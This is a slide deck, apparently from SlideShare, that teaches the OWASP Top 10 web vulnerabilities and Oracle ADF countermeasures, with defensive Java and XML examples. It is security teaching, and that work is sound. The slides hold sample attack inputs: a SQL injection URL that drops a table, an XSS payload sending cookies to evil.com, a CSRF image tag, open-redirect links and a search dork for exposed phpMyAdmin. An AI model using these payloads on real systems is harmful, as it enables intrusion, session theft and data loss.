Top 10 Web Vulnerabilities, and
Securing them with ADF
Brian “Bex” Huff
Chief Software Architect
Agenda
 Intro
 Open Web Application Security Project (OWASP)
 Top 10 Web Application Security Vulnerabilities
 Countermeasures
 References
 For the latest version of this presentation, go to SlideShare:
 http://slideshare.com/bexmex
Intro
 What is OWASP?
• http://owasp.org
• Worldwide non-profit focused on improving software security
• Reaches out to ALL developers: not just security professionals
 Who am I?
• Oracle ACE Director
• Author of 2 books on Oracle Technology
• Twitter: @bex
 What will you learn?
• The top 10 security mistakes that developers make
• How to design software with an assurance of security
• You don’t need to be a security guru to secure your web apps
OWASP Top 10 of 2013
1) Injection
2) Broken Authentication and Session Management
3) Cross Site Scripting
4) Insecure Direct Object References
5) Security Misconfiguration
6) Sensitive Data Exposure (NEW)
7) Missing Function Level Access Control (NEW)
8) Cross Site Request Forgery (CSRF)
9) Using Components with Known Vulnerabilities (NEW)
10) Unvalidated Redirects and Forwards
1) Injection
 Occurs when your app passes user-supplied data on to other systems
• Database, Operating System, LDAP, Web Services
 Hackers "inject" their code to run instead of yours
• To access unauthorized data, or completely take over remote application
 Example: SQL injection attack
• String query = "SELECT * FROM products WHERE name='" + request.getParameter("id") + "'";
 Code expects a nice parameter in the URL
• http://example.com/products?id=123
 Hackers could pass this into the URL instead
• http://example.com/products?id=';+DROP+TABLE+'products';
Example
 Don’t: name your child
Robert’); DROP TABLE Students;--
 Do: expect SQL Injection
Countermeasures
 "Connections" between systems are highly vulnerable
 Always assume data coming in could be "evil"
• Be sure to include "evil" use cases and user stories in your design
 Ideally, only allow the user to select among "safe" options
• Never allow them to pass data between systems unchecked
 If user-input text is needed, use parameterized statements
• Clean up quotes, parenthesis, and comments
 Use a battle-tested library for protecting your database
• ADF prepared statements, OWASP's ESAPI codecs
Example
// good idea: the value is bound to a named parameter (":id" in the view object's WHERE clause)
ViewObject studentVO = this.getStudentView();
studentVO.setNamedWhereClauseParam("id", id);

// bad idea! the value is concatenated straight into the WHERE clause
ViewObject studentVO = this.getStudentView();
studentVO.setWhereClause("id = " + id);

// another bad idea! the whole SQL statement is built from user input
String query = "select * from students where id=" + id;
ViewObject vo = appMod.createViewObjectFromQueryStmt(null, query);
ADF Input Validation
 Occurs on most components automatically
• Additional validator components are available for further filtering
• validateLength, validateLongRange, convertDateTime, etc.
 Exception: when immediate=true for some components
• Can access raw, unfiltered data through managed bean
 Hidden fields do not equal secure fields
• Expect hackers to tamper with the HTML, and insert their own values
• selectOne and selectMany do automatic validation, and are safe
 Use caution with custom AJAX layers
• Not always subject to ADF input validation
2) Broken Authentication and Session Management
 HTTP is a "stateless" protocol
• Nice and simple: HTTP request, HTTP response
• All data must be passed in the request every time
 How do we store state?
• Client side with cookies
• Server side with sessions
 Most apps place a "sessionId" in cookies, or in the URL
• Problem: now stealing sessionIds is just as good as stealing passwords!
 Multiple ways to determine a session ID
• packet sniffing -- especially on an open WiFi access point
• HTTP Referer logs of other sites, if the sessionId is in the URL
Countermeasures
 Assume that a user stole a session ID
• Determine how bad this would be in your application
 Use SSL everywhere!
• Makes it harder for people to “sniff” your session ID
 If you cannot use SSL everywhere, use it for logins
• Have a cryptographically strong session ID (ADF default)
• Have a reasonable timeout, one hour is fine
ADF Countermeasures
 Don’t pass the jsessionid in the URL, put it in a cookie
• Evil sites can sniff your session ID from their referrer logs
• Cookies harder to sniff if SSL is enabled
 Sample web.xml snippet
<!-- WebLogic-specific element: it is placed in WEB-INF/weblogic.xml rather than the standard web.xml -->
<session-descriptor>
  <cookie-name>MYAPPSESSID</cookie-name>
  <url-rewriting-enabled>false</url-rewriting-enabled>   <!-- never append ;jsessionid=... to URLs -->
  <timeout-secs>3600</timeout-secs>                       <!-- one hour -->
</session-descriptor>
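The same policy expressed with the standard Servlet 3.0 session-config element of web.xml, as an added example that is not from the original deck; it additionally sets the HttpOnly and Secure cookie flags that the XSS countermeasures slide later recommends. The cookie name MYAPPSESSID is reused from the snippet above.

```xml
<!-- WEB-INF/web.xml, Servlet 3.0 or later -->
<session-config>
  <!-- minutes: one hour, matching timeout-secs=3600 above -->
  <session-timeout>60</session-timeout>
  <cookie-config>
    <name>MYAPPSESSID</name>
    <!-- document.cookie cannot read the session cookie, so an XSS payload cannot exfiltrate it -->
    <http-only>true</http-only>
    <!-- the browser only sends the cookie over TLS, so it cannot be sniffed on open WiFi -->
    <secure>true</secure>
  </cookie-config>
  <!-- COOKIE only: disables URL rewriting, so the session ID never lands in Referer logs -->
  <tracking-mode>COOKIE</tracking-mode>
</session-config>
```

With secure=true the application must be served over HTTPS end to end; a plain HTTP deployment would simply never receive the cookie.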
3) Cross Site Scripting (XSS)
 Sites must "cleanse" user input before displaying it
• HTML tags can be very dangerous
• If a user can embed a <SCRIPT> tag, all is lost!
 Hackers can create URLs to inject their own HTML onto the page
• Can be used to do almost any kind of attack!!!
 ADF is mostly safe, but occasionally vulnerable
• User generated content is usually HTML encoded on the page
• <script> becomes &lt;script&gt;
• Use caution with the af:resource or f:verbatim tags
• Never pass in unencoded data!
Example
 Example: JSP to draw HTML based on user input
• String html = "<input name='item' type='TEXT' value='" + request.getParameter("item") + "'>";
 Code expects a nice URL:
• http://example.com/buy?item=123
 But a hacker could supply this URL:
• http://example.com/buy?item='><script>document.location='http://evil.com/steal/'+document.cookie</script>
 Then trick an administrator or superuser to go there
• Cookie is stolen, and now evil user can connect as the admin!
Countermeasures
 Never, ever, ever trust user-submitted content!
 Properly "escape" any data before displaying it on web pages
• JavaScript parameters, URL parameters, STYLE elements
• Remove script tags, and possibly anything with a SRC attribute
• Done automatically in ADF, but manually if you bypass ADF and write JS
• Use ESAPI to "cleanse" HTML before dumping to page
 Do not allow state-change from HTTP GET requests
• Otherwise, a rogue IMG tag could delete content
• No state change on initial ADF page load!
 Set the HttpOnly flag in your response headers
• Prevents document.cookie from working in JavaScript
4) Insecure Direct Object Reference
 Assume my project id is 123
 I see a link on “My Projects” page that goes here:
• http://example.com/projects/123
 If I alter the URL, can I see other people’s projects?
• http://example.com/projects/124
 Do you only restrict access in the web form?
 What if I could "guess" the URL? Could I see the page?
• Don't trick yourself into thinking complex URLs are any more secure
• Security != Obscurity
Countermeasures
 Every resource needs a security level
• What roles do you need to access certain items?
• Access Control Lists are easy to implement, but don’t always scale
 All access to that resource should go through the same check
• What action are you taking, with what resource?
• Put it all in one common codebase for simplicity
• May need to run check multiple times, for sub-actions and sub-resources
• Unusual behavior? Have additional authentication questions/layers!
 Front-end restriction is nice for usability, but not security
 Ideally, put all security in the Application Module (model)
• Single location to secure multiple views
Countermeasures, ctd.
 Avoid direct object reference
• Use a temporary variable relevant to just that user
• Use a cryptographically strong variable
 Validate all references, regardless
 Validate access to that reference
• Read, write, update, delete
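One way to put the two countermeasure slides together, as an added Java example that is not part of the deck or of ADF: a per-user map of random, opaque references to real project ids, issued and resolved through one common access check. The class ProjectReferenceMap and its set of owned ids are hypothetical; in an ADF app the set would come from the Application Module and the map would be kept in the user's session.

```java
import java.security.SecureRandom;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import java.util.Set;

/**
 * Per-user indirect reference map: pages only ever show opaque random references,
 * the real project ids never leave the server, and every use goes through checkAccess().
 * Hypothetical helper written for this deck; keep one instance per user session.
 */
public final class ProjectReferenceMap {
    private static final SecureRandom RNG = new SecureRandom();
    private final Set<Long> ownedProjectIds;            // what the model says this user may read
    private final Map<String, Long> refToId = new HashMap<>();
    private final Map<Long, String> idToRef = new HashMap<>();

    public ProjectReferenceMap(Set<Long> ownedProjectIds) {
        this.ownedProjectIds = ownedProjectIds;
    }

    /** Opaque reference for a project, issued only if this user may read it. */
    public String referenceFor(long projectId) {
        checkAccess(projectId);                         // the single common check
        String ref = idToRef.get(projectId);
        if (ref == null) {
            byte[] raw = new byte[16];
            RNG.nextBytes(raw);                         // 128 random bits: not guessable like 123 -> 124
            ref = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
            idToRef.put(projectId, ref);
            refToId.put(ref, projectId);
        }
        return ref;
    }

    /** Resolve a reference taken from the URL; a reference this user never received is rejected. */
    public long resolve(String ref) {
        Long id = refToId.get(ref);
        if (id == null) {
            throw new SecurityException("unknown reference");
        }
        checkAccess(id);                                // validate again on every use, not just at issue time
        return id;
    }

    private void checkAccess(long projectId) {
        if (!ownedProjectIds.contains(projectId)) {
            throw new SecurityException("project " + projectId + " is not accessible to this user");
        }
    }

    public static void main(String[] args) {
        // constructed sample: this user owns project 123 only
        ProjectReferenceMap map = new ProjectReferenceMap(Set.of(123L));
        String ref = map.referenceFor(123L);            // what the "My Projects" link carries instead of 123
        System.out.println("/projects/" + ref + " resolves to project " + map.resolve(ref));
        try {
            map.referenceFor(124L);                     // the neighbour's project: never gets a reference
        } catch (SecurityException e) {
            System.out.println("refused: " + e.getMessage());
        }
        try {
            map.resolve("edited-by-hand");              // altering the URL yields nothing
        } catch (SecurityException e) {
            System.out.println("refused: " + e.getMessage());
        }
    }
}
```

The same checkAccess() call is the place to distinguish read, write, update and delete; the example only models read.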
ADF Global Security Expressions
#{securityContext.authenticated}
#{securityContext.userName}
#{securityContext.userInRole['roleList']}
#{securityContext.userInAllRoles['roleList']}
#{securityContext.taskflowViewable['target']}
#{securityContext.regionViewable['target']}
#{securityContext.userGrantedResource['permission']}
#{securityContext.userGrantedPermission['permission']}
5) Security Misconfiguration
 Everything from the OS to the DB to the ADF framework
 What if ADF issued a security patch?
• Do you have a centralized policy for keeping dependencies up-to-date?
• How long would it take you to discover new code?
• How long would it take to recompile/test/redeploy?
 Do you know all security configurations in the framework?
• Odds are no... documentation is usually obtuse
• “Being helpful is a security hole”
 Have you properly "hardened" your infrastructure?
• Delete default users, disable unused services and ports
• Operating System, WebLogic, Database, MDS
Countermeasures
 Subscribe to newsletters and blog feeds to get patches
• Use automation if possible to verify patches
 Do periodic scans to detect misconfiguration / missing patches
 Disable ports/services/features unused in production
 Disable default users and passwords
 Never send stack traces or SQL errors directly to end users
 Taking over websites shouldn't be this easy:
• http://www.google.com/search?q=inurl:SELECT+inurl:FROM+inurl:WHERE+intitle:phpmyadmin
6) Sensitive Data Exposure
 All applications store sensitive data
• Credit cards, passwords, private health/financial documents
 Where does this data get stored?
• Database, files, logs, backups, etc.
 Where does this data get sent?
• Over the web, backup databases, partners, internal emails
• JMS queue, web service calls
 How are you preventing unauthorized access to all these resources?
Storage Layer Countermeasures
 If you store secrets, encrypt them!
• Use only battle-tested standard encryption algorithms
 Analyze possible threats: inside attack, external user
• Make sure encryption policy is appropriate for the threats
 Encrypt data anywhere it's stored long term
• Especially backups!
• Store backups of decryption keys separately from data
 Restrict access to decrypted data to only authorized users
 Hash all passwords with a standard algorithm, and a "salt"
 Use strong keys to access the information
 Create a password management policy, and stick with it!
Sane Pass Phrase Management Policy
Transport Layer Countermeasures
 Use strong, standards compliant network security protocols
• Use TLS (SSL) on all connections with sensitive data
 Encrypt messages before transmission
• XML-Encryption
 Sign messages before transmission
• XML-Signature
 Disable old, flawed encryption protocols (e.g., SSL 2.0)
7) Missing Function Level Access Control
 Similar to Insecure Direct Object Reference
• Need to block specific actions, even if no resource is identified
 Example: my project is 123
 I will see these URLs on my home page:
• http://example.com/project/123
• http://example.com/user/getProjects/
 I could fish around and try other URLs as well:
• http://example.com/manager/getProjects/
• http://example.com/admin/getProjects/
 Would your application prevent this?
 Same general issue:
• you have front-end security, but not back-end security
Countermeasures
 Do authentication checks at least twice
• Front end UI, and back end Controller
 Don't draw URLs to the page if the user cannot access them
• Bad usability
• Hackers might be tempted to fish around for vulnerabilities
 Never assume a URL is allowed
• Do back-end checks for access, and state change
 Add even more layers as needed:
• Does all security information exist in the URL?
• Can you authenticate right away?
• Might you need to get half way through the request before you know what rights are needed?
• What if the user has access, but their behavior is unusual
• should you prompt for password again, or perhaps for additional authorization?
8) Cross-Site Request Forgery
 Evil sites can hijack your browser, and run secure requests:
1) User logs into secure application behind the firewall
http://example.com/myApp
2) User goes to "evil" website, or loads up "evil" HTML email
3) HTML contains this image:
<img src="http://example.com/myApp/deleteEverything">
 With JavaScript and XSS, evil sites can completely take over your browser
• Can browse around your intranet, log into bank accounts
• Anything you are currently logged into
• Complete control, as long as you stay on the evil site
 Unfortunate side-effect of Single-Sign-On
Countermeasures
 Need a unique token to validate that the request is authentic
• The jsessionId is sometimes sufficient, but can be stolen with XSS
• More secure: unique token for every HTTP request
• If somebody steals your jsessionid, they can only do one request!
 Steps to validate every request
• Put a random number in the session for the next valid token
• Put that token on every HTML web form that causes state change
• When processing a request, validate the token
• Generate another random token for the next request
• Place that token in the session, repeat forever!
• NOTE: might not be needed in JSF 2.1
 http://blog.eisele.net/2011/02/preventing-csrf-with-jsf-20.html
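The five validation steps above, as an added Java example that is not from the deck or from JSF: a synchronizer token that is random, stored in the session, checked in constant time and consumed on every request. CsrfTokenManager is a hypothetical helper and the Map stands in for HttpSession attributes (getAttribute/setAttribute/removeAttribute in a real servlet).

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

/**
 * Per-request synchronizer token, following the steps on the slide.
 * Hypothetical helper for this deck; the Map stands in for HttpSession attributes.
 */
public final class CsrfTokenManager {
    static final String ATTR = "csrf.nextToken";
    private static final SecureRandom RNG = new SecureRandom();

    /** Steps 1, 4 and 5: generate a fresh random token and store it as the only token valid for the next request. */
    public static String issueToken(Map<String, Object> session) {
        byte[] raw = new byte[32];                      // 256 random bits
        RNG.nextBytes(raw);
        String token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
        session.put(ATTR, token);
        return token;                                   // step 2: emit this as a hidden field in every state-changing form
    }

    /**
     * Step 3: validate the submitted token. The stored token is consumed either way,
     * so each token is good for exactly one request; a pending form is invalidated by
     * any failed attempt, which is the trade-off the slide's "one request" design makes.
     */
    public static boolean validate(Map<String, Object> session, String submitted) {
        Object expected = session.remove(ATTR);
        if (expected == null || submitted == null) {
            return false;
        }
        byte[] a = expected.toString().getBytes(StandardCharsets.UTF_8);
        byte[] b = submitted.getBytes(StandardCharsets.UTF_8);
        return MessageDigest.isEqual(a, b);             // constant-time comparison, no early exit on mismatch
    }

    public static void main(String[] args) {
        Map<String, Object> session = new HashMap<>();  // constructed stand-in for one user's session

        // Normal flow: the rendered form carries the token and the POST handler validates it.
        String formToken = issueToken(session);
        boolean genuine = validate(session, formToken);

        // Submitting the same token a second time is rejected: it was consumed above.
        boolean replayed = validate(session, formToken);

        // The handler issues the next token; a forged request (evil site, rogue IMG tag)
        // cannot read the session and therefore cannot supply it.
        issueToken(session);
        boolean forged = validate(session, "attacker-guess");

        System.out.println("genuine=" + genuine + " replayed=" + replayed + " forged=" + forged);
    }
}
```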
9) Using Components with Known Vulnerabilities
 In addition to ADF, you may use other frameworks
• Open Source Libraries
• OEM Libraries
• JavaScript frameworks
• JARs and JARs and JARs of fun...
 Automated hacker tools can find these dependencies
• Unless you are always on the latest stable version, you are vulnerable
 All possible attack vectors are open
• XSS, injection, CSRF being the most common and most troublesome
• Ranges from annoying to complete takeover of your servers
Countermeasures
 At a minimum, manually keep track of dependencies/versions
• Developers must justify every JAR they depend on
• Must manually keep track of version, and check before each release
 Better still, use Maven to perform automated builds
• Automatically check your JAR version vs. latest stable release
 Both have risks to the build process
• What if you have to refactor your code every time the JAR is revised?
• Annoying, but a necessary step to secure your applications
10) Unvalidated Redirects and Forwards
 Most sites allow redirects to other sites, or pages within the site:
• http://example.com/redirect?url=google.com
 But, open redirect pages can be used by "phishers" to create links to their site:
• http://example.com/redirect?url=evil.com
 Link looks like it goes to "example.com", but it goes to "evil.com"
 Or, can trick a site user into harming their own site:
• http://example.com/redirect?url=/admin.jsp?deleteEverything=true
 Sometimes called "phishing holes"
ADF Attack Vectors
 Common places to do redirects
• PagePhaseListener
• Download Servlet
• Task Flow router
 Example code for a redirect:
FacesContext fctx = FacesContext.getCurrentInstance();
fctx.getExternalContext().redirect("http://google.com");
Countermeasures
 Restrict redirects to a limited number of "trusted" sites
 Keep a list of all redirect URLs, and pass the ID in the request, instead of the URL
• http://example.com/redirect?urlId=123
 Hash the URL with a secret, and pass the hash in the URL
• http://example.com/redirect?url=google.com&hash=a1b2c3
 Example: does this URL look like a Google Invoice to you?
• http://www.google.com/#invoiceId=123&q=oHg5SJYRHA0&btnI=3564
 Question: are URL shorteners inherently unsafe?
• TinyUrl offers a "preview" feature: others should as well
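The two countermeasures above (a redirect ID looked up in a trusted list, and a URL carried together with a keyed hash) as an added Java example that is not from the deck or from ADF. RedirectPolicy, its trusted list and the demo secret are constructed for this example; the hash is an HMAC-SHA256 over the URL, so the server can only follow URLs it signed itself.

```java
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.MessageDigest;
import java.util.Map;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

/**
 * Redirect target resolution: either a known id, or a URL carrying an HMAC made with a server secret.
 * Hypothetical helper for this deck. A null result means: do not redirect, show the home page instead.
 */
public final class RedirectPolicy {
    // constructed allow-list: the only targets /redirect?urlId=... may send a user to
    private static final Map<String, String> TRUSTED = Map.of(
            "123", "https://www.google.com/",
            "124", "https://www.oracle.com/");
    private final byte[] secret;                        // server-side only; never in a URL or page

    public RedirectPolicy(byte[] secret) {
        this.secret = secret.clone();
    }

    /** /redirect?urlId=123 : look the id up; anything not listed is refused. */
    public static String targetForId(String urlId) {
        return urlId == null ? null : TRUSTED.get(urlId);
    }

    /** The hash the application puts into links it generates itself. */
    public String sign(String url) {
        try {
            Mac mac = Mac.getInstance("HmacSHA256");
            mac.init(new SecretKeySpec(secret, "HmacSHA256"));
            byte[] tag = mac.doFinal(url.getBytes(StandardCharsets.UTF_8));
            StringBuilder hex = new StringBuilder();
            for (byte b : tag) {
                hex.append(String.format("%02x", b));
            }
            return hex.toString();
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    /** /redirect?url=...&hash=... : only a URL whose hash matches is followed. */
    public String targetForSigned(String url, String hash) {
        if (url == null || hash == null) {
            return null;
        }
        byte[] expected = sign(url).getBytes(StandardCharsets.UTF_8);
        byte[] given = hash.getBytes(StandardCharsets.UTF_8);
        return MessageDigest.isEqual(expected, given) ? url : null;   // constant-time compare
    }

    public static void main(String[] args) {
        RedirectPolicy policy = new RedirectPolicy(
                "constructed-demo-secret".getBytes(StandardCharsets.UTF_8));

        System.out.println("urlId=123 -> " + targetForId("123"));
        System.out.println("urlId=999 -> " + targetForId("999"));      // not in the list: refused

        String link = "https://www.google.com/";
        String hash = policy.sign(link);                                 // emitted into the app's own link
        System.out.println("signed url -> " + policy.targetForSigned(link, hash));

        // A phisher can swap the url parameter, but cannot produce a matching hash without the secret,
        // and the same holds for an internal path such as /admin.jsp?deleteEverything=true
        System.out.println("forged url -> " + policy.targetForSigned("http://evil.com/", hash));
    }
}
```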
References
 OWASP top 10, and associated resources
• https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
 ADF Code guidelines to prevent security holes:
• http://www.oracle.com/technetwork/developer-tools/adf/learnmore/adf-code-guidelines-v1-00-1845659.pdf
 JavaScript best practices for ADF
• http://www.oracle.com/technetwork/developer-tools/jdev/1-2011-javascript-302460.pdf
 Hardening Fusion Middleware to avoid OWASP issues:
• http://antonfroehlich.blogspot.com/2012/06/handling-owasp-top-ten-application.html
 JSF and OWASP
• http://turbomanage.files.wordpress.com/2009/10/securing-jsf-applications-against-owasp-top-ten-color.pdf
 My Company: http://bezzotech.com
 My Blog: http://bexhuff.com
 My Slides: http://slideshare.com/bexmex
 My Tweets: @bex
 My Self: bex@bezzotech.com
Questions?
Switching to Oracle Document CloudSwitching to Oracle Document Cloud
Switching to Oracle Document Cloud
 
AP Automation for EBS or PeopleSoft with Oracle WebCenter
AP Automation for EBS or PeopleSoft with Oracle WebCenterAP Automation for EBS or PeopleSoft with Oracle WebCenter
AP Automation for EBS or PeopleSoft with Oracle WebCenter
 
Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...
Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...
Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...
 
Integrating ADF Mobile with WebCenter
Integrating ADF Mobile with WebCenterIntegrating ADF Mobile with WebCenter
Integrating ADF Mobile with WebCenter
 
WebCenter Content & Portal Methodology Deep Dive with Case Studies
WebCenter Content & Portal Methodology Deep Dive with Case StudiesWebCenter Content & Portal Methodology Deep Dive with Case Studies
WebCenter Content & Portal Methodology Deep Dive with Case Studies
 
Creating Next-Generation ADF Mobile Applications
Creating Next-Generation ADF Mobile ApplicationsCreating Next-Generation ADF Mobile Applications
Creating Next-Generation ADF Mobile Applications
 
FatWire Tutorial For Site Studio Developers
FatWire Tutorial For Site Studio DevelopersFatWire Tutorial For Site Studio Developers
FatWire Tutorial For Site Studio Developers
 
Creating a Global E-Commerce Website With E-Business Suite and Fusion Middleware
Creating a Global E-Commerce Website With E-Business Suite and Fusion MiddlewareCreating a Global E-Commerce Website With E-Business Suite and Fusion Middleware
Creating a Global E-Commerce Website With E-Business Suite and Fusion Middleware
 
Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...
Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...
Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...
 
Creating and Maintaining An Internationalized Website
Creating and Maintaining An Internationalized WebsiteCreating and Maintaining An Internationalized Website
Creating and Maintaining An Internationalized Website
 
The Top 10 Things Oracle UCM Users Need To Know About WebLogic
The Top 10 Things Oracle UCM Users Need To Know About WebLogicThe Top 10 Things Oracle UCM Users Need To Know About WebLogic
The Top 10 Things Oracle UCM Users Need To Know About WebLogic
 
Oracle UCM Security: Challenges and Best Practices
Oracle UCM Security: Challenges and Best PracticesOracle UCM Security: Challenges and Best Practices
Oracle UCM Security: Challenges and Best Practices
 
Oracle UCM: Web Site Performance Tuning
Oracle UCM: Web Site Performance TuningOracle UCM: Web Site Performance Tuning
Oracle UCM: Web Site Performance Tuning
 
Real World Examples of Succesful Enterprise Content Management Strategies
Real World Examples of Succesful Enterprise Content Management StrategiesReal World Examples of Succesful Enterprise Content Management Strategies
Real World Examples of Succesful Enterprise Content Management Strategies
 
A Pragmatic Strategy for Oracle Enterprise Content Management
A Pragmatic Strategy for Oracle Enterprise Content ManagementA Pragmatic Strategy for Oracle Enterprise Content Management
A Pragmatic Strategy for Oracle Enterprise Content Management
 
Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)
Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)
Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)
 
A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)
A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)
A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)
 
Enterprise 2.0: What it is, and how you'll fail!
Enterprise 2.0: What it is, and how you'll fail!Enterprise 2.0: What it is, and how you'll fail!
Enterprise 2.0: What it is, and how you'll fail!
 

Kürzlich hochgeladen

My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 

Kürzlich hochgeladen (20)

My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
